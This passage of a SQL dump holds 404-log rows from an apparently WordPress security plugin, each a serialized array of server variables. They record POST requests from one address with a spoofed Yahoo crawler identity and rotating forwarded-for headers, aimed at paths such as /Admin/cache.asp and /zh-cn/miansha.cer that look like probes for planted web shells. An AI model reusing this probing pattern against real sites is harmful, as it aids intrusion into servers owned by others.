Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"202.103.76.142\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"202.103.76.142\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/Admin/cache.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/Admin/cache.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHC40q-QPicCh3WFsYoBwAAAIo\";s:12:\"REDIRECT_URL\";s:16:\"/Admin/cache.asp\";s:11:\"REMOTE_ADDR\";s:12:\"110.87.25.73\";s:11:\"REMOTE_PORT\";s:5:\"51469\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/Admin/cache.asp\";s:10:\"SCRIPT_URL\";s:16:\"/Admin/cache.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHC40q-QPicCh3WFsYoBwAAAIo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930852.0415\";s:12:\"REQUEST_TIME\";s:10:\"1571930852\";}}','notice','2019-10-24 15:27:33','2019-10-24 15:27:32',35268888,37077104,'http://bintara.com.my//Admin/cache.asp',1,0,'202.103.76.142'),(28999,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//auxil/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"822\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"61.232.75.78\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"61.232.75.78\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/auxil/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/auxil/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHC0P5cHc@dX2BdZ47JeQAAABU\";s:12:\"REDIRECT_URL\";s:16:\"/auxil/index.asp\";s:11:\"REMOTE_ADDR\";s:12:\"110.87.25.73\";s:11:\"REMOTE_PORT\";s:5:\"50854\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/auxil/index.asp\";s:10:\"SCRIPT_URL\";s:16:\"/auxil/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHC0P5cHc@dX2BdZ47JeQAAABU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930832.2331\";s:12:\"REQUEST_TIME\";s:10:\"1571930832\";}}','notice','2019-10-24 15:27:13','2019-10-24 15:27:12',35343632,37154328,'http://bintara.com.my//auxil/index.asp',1,0,'61.232.75.78'),(29000,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//Admin/cache.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"822\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"58.18.45.221\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"58.18.45.221\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/Admin/cache.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/Admin/cache.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHC3Uq-QPicCh3WFsYoAgAAAJc\";s:12:\"REDIRECT_URL\";s:16:\"/Admin/cache.asp\";s:11:\"REMOTE_ADDR\";s:12:\"110.87.25.73\";s:11:\"REMOTE_PORT\";s:5:\"51469\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/Admin/cache.asp\";s:10:\"SCRIPT_URL\";s:16:\"/Admin/cache.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHC3Uq-QPicCh3WFsYoAgAAAJc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930845.3586\";s:12:\"REQUEST_TIME\";s:10:\"1571930845\";}}','notice','2019-10-24 15:27:27','2019-10-24 15:27:25',35342688,37145128,'http://bintara.com.my//Admin/cache.asp',1,0,'58.18.45.221'),(28998,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//admin/langdi.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"686\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"218.194.173.4\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"218.194.173.4\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/admin/langdi.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/admin/langdi.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHCyP5cHc@dX2BdZ47JdgAAAAU\";s:12:\"REDIRECT_URL\";s:17:\"/admin/langdi.asp\";s:11:\"REMOTE_ADDR\";s:12:\"110.87.25.73\";s:11:\"REMOTE_PORT\";s:5:\"50854\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/admin/langdi.asp\";s:10:\"SCRIPT_URL\";s:17:\"/admin/langdi.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHCyP5cHc@dX2BdZ47JdgAAAAU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930824.4108\";s:12:\"REQUEST_TIME\";s:10:\"1571930824\";}}','notice','2019-10-24 15:27:06','2019-10-24 15:27:04',35265904,37062384,'http://bintara.com.my//admin/langdi.asp',1,0,'218.194.173.4'),(28997,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//admin/langdi.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"821\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"121.31.95.74\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"121.31.95.74\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/admin/langdi.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/admin/langdi.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHCvf5cHc@dX2BdZ47JcgAAABc\";s:12:\"REDIRECT_URL\";s:17:\"/admin/langdi.asp\";s:11:\"REMOTE_ADDR\";s:12:\"110.87.25.73\";s:11:\"REMOTE_PORT\";s:5:\"50228\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/admin/langdi.asp\";s:10:\"SCRIPT_URL\";s:17:\"/admin/langdi.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHCvf5cHc@dX2BdZ47JcgAAABc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930813.4303\";s:12:\"REQUEST_TIME\";s:10:\"1571930813\";}}','notice','2019-10-24 15:26:55','2019-10-24 15:26:53',35343096,37146008,'http://bintara.com.my//admin/langdi.asp',1,0,'121.31.95.74'),(28996,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//zh-cn/miansha.cer\";s:14:\"CONTENT_LENGTH\";s:3:\"685\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"220.192.138.4\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"220.192.138.4\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/zh-cn/miansha.cer\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/zh-cn/miansha.cer\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHCs-5cHc@dX2BdZ47JbgAAAAQ\";s:12:\"REDIRECT_URL\";s:18:\"/zh-cn/miansha.cer\";s:11:\"REMOTE_ADDR\";s:12:\"110.87.25.73\";s:11:\"REMOTE_PORT\";s:5:\"50228\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/zh-cn/miansha.cer\";s:10:\"SCRIPT_URL\";s:18:\"/zh-cn/miansha.cer\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHCs-5cHc@dX2BdZ47JbgAAAAQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930803.5223\";s:12:\"REQUEST_TIME\";s:10:\"1571930803\";}}','notice','2019-10-24 15:26:45','2019-10-24 15:26:43',35270904,37071976,'http://bintara.com.my//zh-cn/miansha.cer',1,0,'220.192.138.4'),(28995,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//zh-cn/miansha.cer\";s:14:\"CONTENT_LENGTH\";s:3:\"820\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"202.122.77.6\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"202.122.77.6\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/zh-cn/miansha.cer\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/zh-cn/miansha.cer\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHCoqHtjB8Y0WvpqtvMKwAAANM\";s:12:\"REDIRECT_URL\";s:18:\"/zh-cn/miansha.cer\";s:11:\"REMOTE_ADDR\";s:12:\"110.87.25.73\";s:11:\"REMOTE_PORT\";s:5:\"49753\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/zh-cn/miansha.cer\";s:10:\"SCRIPT_URL\";s:18:\"/zh-cn/miansha.cer\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHCoqHtjB8Y0WvpqtvMKwAAANM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571930786.165\";s:12:\"REQUEST_TIME\";s:10:\"1571930786\";}}','notice','2019-10-24 15:26:28','2019-10-24 15:26:26',35342032,37139832,'http://bintara.com.my//zh-cn/miansha.cer',1,0,'202.122.77.6'),(28994,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//zh-cn/miansha.cer\";s:14:\"CONTENT_LENGTH\";s:3:\"300\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"117.51.224.231\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"117.51.224.231\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/zh-cn/miansha.cer\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/zh-cn/miansha.cer\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHCju0MT698oQwhBK9g5gAAAQ4\";s:12:\"REDIRECT_URL\";s:18:\"/zh-cn/miansha.cer\";s:11:\"REMOTE_ADDR\";s:12:\"110.87.25.73\";s:11:\"REMOTE_PORT\";s:5:\"65348\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/zh-cn/miansha.cer\";s:10:\"SCRIPT_URL\";s:18:\"/zh-cn/miansha.cer\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHCju0MT698oQwhBK9g5gAAAQ4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930766.1959\";s:12:\"REQUEST_TIME\";s:10:\"1571930766\";}}','notice','2019-10-24 15:26:08','2019-10-24 15:26:06',35266096,37082080,'http://bintara.com.my//zh-cn/miansha.cer',1,0,'117.51.224.231'),(28993,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"//2015/Images/cache.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"202.110.109.159\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"202.110.109.159\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/2015/Images/cache.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/2015/Images/cache.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHChkq-QPicCh3WFsYn2AAAAJc\";s:12:\"REDIRECT_URL\";s:22:\"/2015/Images/cache.asp\";s:11:\"REMOTE_ADDR\";s:12:\"110.87.25.73\";s:11:\"REMOTE_PORT\";s:5:\"65121\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/2015/Images/cache.asp\";s:10:\"SCRIPT_URL\";s:22:\"/2015/Images/cache.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHChkq-QPicCh3WFsYn2AAAAJc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930758.8363\";s:12:\"REQUEST_TIME\";s:10:\"1571930758\";}}','notice','2019-10-24 15:26:01','2019-10-24 15:25:59',35270176,37063328,'http://bintara.com.my//2015/Images/cache.asp',1,0,'202.110.109.159'),(28992,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//images/css/Thumb.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"682\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 